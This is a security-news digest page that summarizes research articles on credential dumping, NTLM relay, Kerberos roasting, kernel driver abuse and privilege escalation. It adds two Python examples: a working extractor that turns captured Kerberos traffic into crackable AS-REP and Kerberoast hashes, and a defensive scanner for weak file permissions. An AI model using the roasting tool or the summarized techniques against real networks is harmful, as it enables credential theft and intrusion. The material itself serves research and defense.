Breaking the Shield: Unpacking a VMProtected Windows Kernel Driver
Original text by eversinc33
The article explains a practical workflow for unpacking a Windows kernel driver protected with VMProtect and preparing it for reverse engineering. The author analyzes an anti-cheat driver (KSophon_x64.sys) protected by VMProtect v2–3 and demonstrates how to bypass its protection mechanisms to restore a usable binary for analysis. The main challenge comes…
https://core-jmp.org/2026/03/breaking-the-shield-unpacking-a-vmprotected-windows-kernel-driver/
Ghost in LSASS: Inside the KslKatz Credential Dumping Framework
Original text by S1lkys
The GitHub project KslKatz introduces a credential-dumping tool designed for red-team operations and security research on Windows systems. The project combines techniques from multiple tools—most notably KslDump and GhostKatz—to extract credentials from the lsass.exe process, which stores authentication secrets used by Windows. Instead of relying on common approaches such as direct…
https://core-jmp.org/2026/03/ghost-in-lsass-inside-the-kslkatz-credential-dumping-framework/
From PCAP to Passwords: Automating Kerberos Roast Extraction
Original text by jalvarezz13
Krb5RoastParser is an open-source Python tool created to simplify the extraction of Kerberos authentication hashes from captured network traffic. Instead of manually analyzing packets in Wireshark, the tool processes .pcap files and automatically identifies Kerberos authentication messages such as AS-REQ, AS-REP, and TGS-REP. Using tshark, the script parses these packets and…
https://core-jmp.org/2026/03/from-pcap-to-passwords-automating-kerberos-roast-extraction/
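The conversion the tool automates, shown here as an added example rather than Krb5RoastParser's own code: it takes rows in the shape of tshark `-T fields` output (the exact field list, the comma-joining of repeated fields and the bare lowercase hex for byte fields are assumptions about tshark's output; the sample rows are constructed) and emits hashcat-ready AS-REP (RC4) and TGS-REP (RC4 and AES) hashes in the layouts impacket and hashcat use. The part worth seeing is which of the several ciphers in one packet to keep: an AS-REP lists the ticket before the user-keyed enc-part, a TGS-REP lists the service-keyed ticket first.

```python
"""Turn tshark Kerberos field rows into hashcat-ready roast hashes.

Added example, not Krb5RoastParser's own code. Rows are assumed to come from:
  tshark -r capture.pcap -Y kerberos -T fields -E separator=/t \
    -e kerberos.msg_type -e kerberos.CNameString -e kerberos.realm \
    -e kerberos.SNameString -e kerberos.etype -e kerberos.cipher
with repeated fields comma-joined and byte fields as bare lowercase hex.
Hash layouts follow the impacket / hashcat conventions.
"""
from dataclasses import dataclass
from typing import List, Optional

AS_REQ, AS_REP, TGS_REP = 10, 11, 13        # Kerberos msg-type values
RC4_HMAC, AES128, AES256 = 23, 17, 18       # encryption types (RFC 3961 / RFC 4757)
RC4_CKSUM_HEX = 32                          # 16-byte HMAC-MD5 checksum leads the data
AES_CKSUM_HEX = 24                          # 12-byte HMAC-SHA1-96 checksum trails the data


@dataclass
class KrbRow:
    msg_type: int
    cname: str
    realm: str
    sname: str            # SPN components joined with '/'
    etypes: List[int]     # every kerberos.etype in the packet, in order
    ciphers: List[str]    # every kerberos.cipher in the packet, in order


def parse_tshark_line(line: str) -> Optional[KrbRow]:
    """Parse one tab-separated row; returns None for rows without a cipher."""
    parts = line.rstrip("\r\n").split("\t")
    if len(parts) != 6 or not parts[0] or not parts[5]:
        return None
    msg_type, cname, realm, sname, etypes, ciphers = parts
    return KrbRow(
        msg_type=int(msg_type.split(",")[0]),
        cname=cname.split(",")[0],
        realm=realm.split(",")[0],
        sname="/".join(p for p in sname.split(",") if p),
        etypes=[int(e) for e in etypes.split(",") if e],
        ciphers=[c.lower() for c in ciphers.split(",") if c],
    )


def to_hashcat(row: KrbRow) -> Optional[str]:
    """Build the crackable hash for one reply, or None if not supported.

    An AS-REP carries the ticket (krbtgt key) before the enc-part (user key),
    so the LAST cipher is the one worth cracking. A TGS-REP carries the
    ticket (service key) FIRST, followed by an enc-part under the session
    key, so Kerberoasting wants the FIRST cipher.
    """
    if row.msg_type == AS_REP:
        etype, cipher = row.etypes[-1], row.ciphers[-1]
        if etype != RC4_HMAC:
            return None               # AES AS-REP layouts are not covered here
        return (f"$krb5asrep${etype}${row.cname}@{row.realm}:"
                f"{cipher[:RC4_CKSUM_HEX]}${cipher[RC4_CKSUM_HEX:]}")
    if row.msg_type == TGS_REP:
        etype, cipher = row.etypes[0], row.ciphers[0]
        spn = row.sname.replace(":", "~")   # impacket's convention for the port separator
        if etype == RC4_HMAC:
            return (f"$krb5tgs${etype}$*{row.cname}${row.realm}${spn}*$"
                    f"{cipher[:RC4_CKSUM_HEX]}${cipher[RC4_CKSUM_HEX:]}")
        if etype in (AES128, AES256):
            return (f"$krb5tgs${etype}${row.cname}${row.realm}$*{spn}*$"
                    f"{cipher[-AES_CKSUM_HEX:]}${cipher[:-AES_CKSUM_HEX]}")
    return None                           # AS-REQ pre-auth and others: skipped


def extract_hashes(lines) -> List[str]:
    """Run every row through the parser and keep the hashes that came out."""
    out = []
    for line in lines:
        row = parse_tshark_line(line)
        if row is not None:
            h = to_hashcat(row)
            if h:
                out.append(h)
    return out


# Constructed sample rows (not real captured traffic). The etype lists mimic
# the order tshark reports them: padata, ticket enc-part, reply enc-part.
SAMPLE_ROWS = [
    "11\talice\tCORP.LOCAL\tkrbtgt,CORP.LOCAL\t23,18,23\t" + "ee" * 40 + "," + "aa" * 16 + "bb" * 24,
    "13\tbob\tCORP.LOCAL\tMSSQLSvc,db01.corp.local:1433\t18,18\t" + "cc" * 30 + "dd" * 12 + "," + "ff" * 40,
    "13\tcarol\tCORP.LOCAL\tHTTP,web01.corp.local\t23,23\t" + "11" * 16 + "22" * 24 + "," + "33" * 40,
    "10\tdave\tCORP.LOCAL\tkrbtgt,CORP.LOCAL\t18,17,23\t" + "44" * 52,
]

if __name__ == "__main__":
    for h in extract_hashes(SAMPLE_ROWS):
        print(h)
```

On real output, `extract_hashes(open("fields.tsv"))` is enough; run `hashcat --identify` on a line or two before committing to a long job, because first-versus-last cipher selection is the step most home-grown scripts get wrong, and a hash built from the ticket blob will never crack.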
Breaking the Flat Network: How Tiering Models Protect Active Directory
Original text by Aurelien Chalot
The article explains why many enterprise networks remain vulnerable due to flat network architectures, where systems and administrative privileges are poorly segmented. Drawing on years of internal penetration-testing experience, the author shows that even organizations equipped with modern security tools can still be compromised if attackers gain an initial foothold.…
https://core-jmp.org/2026/03/breaking-the-flat-network-how-tiering-models-protect-active-directory/
Out-of-Cancel: A New Linux Kernel Race Condition Bug Class
Original text by v4bel
The article introduces a newly identified Linux kernel vulnerability pattern called “Out-of-Cancel”, which arises from incorrect assumptions about the behavior of workqueue cancellation APIs. The author analyzes how functions such as cancel_work_sync() or cancel_delayed_work_sync() are often used in kernel teardown paths to stop asynchronous work before freeing an object. However, these…
https://core-jmp.org/2026/03/out-of-cancel-a-new-linux-kernel-race-condition-bug-class/
When DNS Forwarding Meets Recursion: Understanding Conditional Forwarders in Windows
Original text by https://it-pro-berlin.de
The article analyzes how conditional forwarders and recursion interact in Windows DNS servers, clarifying a common misconception among administrators. The author investigates a claim that disabling recursion globally on a Windows DNS server would also disable conditional forwarders. Through experiments and configuration analysis, the article shows that conditional forwarders can actually…
https://core-jmp.org/2026/03/when-dns-forwarding-meets-recursion-understanding-conditional-forwarders-in-windows/
Relaying Trust: Exploiting NTLM Authentication to Compromise Active Directory
Original text by SecCoreGmbH
The article explains how NTLM relay attacks can be used to gain unauthorized access in Active Directory environments when certain security protections are not enforced. The author demonstrates a practical attack scenario where an attacker captures NTLM authentication from a Windows system and relays it to another service such as LDAP…
https://core-jmp.org/2026/03/relaying-trust-exploiting-ntlm-authentication-to-compromise-active-directory/
Stealth Injection with ROP: Thread Hijacking Without Executable Memory
Original text by Umarex
The article introduces a technique called T(ROP)H (Thread Hijacking with ROP), which enables DLL injection into a remote Windows process without allocating executable memory. Traditional thread hijacking typically allocates memory with execute permissions and places shellcode there before redirecting a thread’s instruction pointer to the payload. However, allocating executable memory is…
https://core-jmp.org/2026/03/stealth-injection-with-rop-thread-hijacking-without-executable-memory/
Breaking the Firmware Trust: Disabling Security in a Locked BIOS
Original text by Craig S. Blackie
The article demonstrates how firmware-level modifications can undermine system security even when the BIOS/UEFI interface is locked with a password. The research focuses on modifying a UEFI firmware image directly at the flash level, allowing an attacker with physical access to disable security features while leaving the BIOS interface…
https://core-jmp.org/2026/03/breaking-the-firmware-trust-disabling-security-in-a-locked-bios/
Backup to SYSTEM: Exploiting the IDrive Client Privilege Escalation Flaw
Original text by Ddos
The article describes a local privilege escalation vulnerability in the IDrive Cloud Backup Client for Windows, tracked as CVE-2026-1995. The flaw arises from insecure permission settings in files used by the backup client service. The service process id_service.exe runs with SYSTEM privileges and periodically reads configuration files located in C:\ProgramData\IDrive. These…
https://core-jmp.org/2026/03/backup-to-system-exploiting-the-idrive-client-privilege-escalation-flaw/
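The precondition described above, a SYSTEM service consuming files that low-privileged users can modify, is the thing to audit for on any host with a third-party agent. The following Python is an added example, not the advisory's or the vendor's code: it parses the two-lines-per-file format that `icacls <dir>\* /save <out>` writes (file name, then the DACL as SDDL) and reports every file whose DACL grants write-class rights to Everyone, Users, Authenticated Users or INTERACTIVE. The sample DACLs are constructed; the file-name/SDDL pairing and the UTF-16 encoding of the saved file are assumptions about icacls.

```python
"""Find files whose DACL lets low-privileged principals modify them.

Added example, not the advisory's exploit code. Input is the format that
  icacls C:\\ProgramData\\IDrive\\* /save acls.txt /T
writes: one line with the file name, the next with its SDDL string.
"""
import re
from typing import Dict, List, Tuple

# Well-known SDDL SID abbreviations that any local user holds.
LOW_PRIV_SIDS = {"WD": "Everyone", "BU": "BUILTIN\\Users",
                 "AU": "Authenticated Users", "IU": "INTERACTIVE"}

# Access-mask bits that let a caller change a file's content or its security.
FILE_WRITE_DATA, FILE_APPEND_DATA = 0x2, 0x4
FILE_WRITE_EA, FILE_WRITE_ATTRIBUTES = 0x10, 0x100
DELETE, WRITE_DAC, WRITE_OWNER = 0x10000, 0x40000, 0x80000
GENERIC_WRITE, GENERIC_ALL = 0x40000000, 0x10000000
WRITE_MASK = (FILE_WRITE_DATA | FILE_APPEND_DATA | FILE_WRITE_EA
              | FILE_WRITE_ATTRIBUTES | DELETE | WRITE_DAC | WRITE_OWNER
              | GENERIC_WRITE | GENERIC_ALL)

# SDDL two-letter rights tokens and the masks they expand to for files.
RIGHT_TOKENS = {"FA": 0x1F01FF, "FR": 0x120089, "FW": 0x120116, "FX": 0x1200A0,
                "GA": GENERIC_ALL, "GW": GENERIC_WRITE, "GR": 0x80000000,
                "GX": 0x20000000, "WD": WRITE_DAC, "WO": WRITE_OWNER, "SD": DELETE}

# (ace_type;flags;rights;object_guid;inherit_guid;sid)
ACE_RE = re.compile(r"\((?P<type>[^;]*);(?P<flags>[^;]*);(?P<rights>[^;]*);"
                    r"[^;]*;[^;]*;(?P<sid>[^)]*)\)")


def rights_mask(token: str) -> int:
    """Translate an SDDL rights field (hex mask or concatenated tokens) into a mask."""
    if token.lower().startswith("0x"):
        return int(token, 16)
    mask = 0
    for i in range(0, len(token), 2):
        mask |= RIGHT_TOKENS.get(token[i:i + 2], 0)   # unknown tokens add nothing
    return mask


def writable_by_low_priv(sddl: str) -> List[Tuple[str, int]]:
    """Return (principal, effective write bits) for low-privileged SIDs.

    Deny ACEs for the same SID are subtracted first, which approximates the
    canonical evaluation order; a full check would also expand group SIDs.
    """
    allowed: Dict[str, int] = {}
    denied: Dict[str, int] = {}
    for m in ACE_RE.finditer(sddl):
        sid = m.group("sid")
        if sid not in LOW_PRIV_SIDS:
            continue                     # literal S-1-... SIDs are not classified here
        mask = rights_mask(m.group("rights"))
        if m.group("type") == "A":
            allowed[sid] = allowed.get(sid, 0) | mask
        elif m.group("type") == "D":
            denied[sid] = denied.get(sid, 0) | mask
    findings = []
    for sid, mask in allowed.items():
        effective = (mask & ~denied.get(sid, 0)) & WRITE_MASK
        if effective:
            findings.append((LOW_PRIV_SIDS[sid], effective))
    return findings


def scan_icacls_save(text: str) -> Dict[str, List[Tuple[str, int]]]:
    """Pair file-name lines with SDDL lines and keep the files with findings."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    report: Dict[str, List[Tuple[str, int]]] = {}
    for name, sddl in zip(lines[0::2], lines[1::2]):
        hits = writable_by_low_priv(sddl)
        if hits:
            report[name] = hits
    return report


# Constructed sample: config.ini is Modify for Users (0x1301bf), settings.xml
# is read-only for Users (0x1200a9), and the log file denies AU everything
# before a stray allow, so only config.ini should be reported.
SAMPLE = """\
config.ini
D:AI(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1301bf;;;BU)
settings.xml
D:AI(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)
logs\\service.log
D:AI(A;ID;FA;;;SY)(A;ID;FA;;;BA)(D;;FA;;;AU)(A;ID;FA;;;AU)
"""

if __name__ == "__main__":
    for name, hits in scan_icacls_save(SAMPLE).items():
        for who, bits in hits:
            print(f"{name}: {who} has write-class access (mask 0x{bits:x})")
```

To run it against a live host, save the DACLs with icacls as shown in the docstring, then `scan_icacls_save(open("acls.txt", encoding="utf-16").read())`; any hit on a file that a SYSTEM service parses is the same class of weakness the advisory describes, whatever the product.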
Inside WMI: Tracing Windows Management from Consumers to COM Providers
Original text by Jonathan Johnson
The two-part article explores the internal architecture of Windows Management Instrumentation (WMI) and explains how management queries and actions are executed inside Windows. WMI is Microsoft’s implementation of WBEM (Web-Based Enterprise Management) and provides a standardized way for applications and administrators to query system information or manage resources such as…
https://core-jmp.org/2026/03/inside-wmi-tracing-windows-management-from-consumers-to-com-providers/
Hidden Bugs in Plain Sight: Hunting Vulnerabilities Inside Shared Libraries
Original text by Grzegorz Wypych (h0rac)
The article explains how security researchers can discover vulnerabilities that hide not in the main application binary but inside the shared libraries it depends on. The author presents the concept behind the ByteRay vulnerability hunting engine, which focuses on tracking how input data flows across program boundaries—from the main…
https://core-jmp.org/2026/03/hidden-bugs-in-plain-sight-hunting-vulnerabilities-inside-shared-libraries/
Bypassing Code Integrity Using BYOVD for Kernel R/W Primitives
Original text by S12 – 0x12Dark Development
The article demonstrates how attackers can bypass Windows Kernel Code Integrity protections by abusing the BYOVD (Bring Your Own Vulnerable Driver) technique to obtain powerful kernel read/write primitives. Instead of loading a malicious unsigned driver, the attacker loads a legitimate but vulnerable signed driver that contains exploitable IOCTL…
https://core-jmp.org/2026/03/bypassing-code-integrity-using-byovd-for-kernel-r-w-primitives/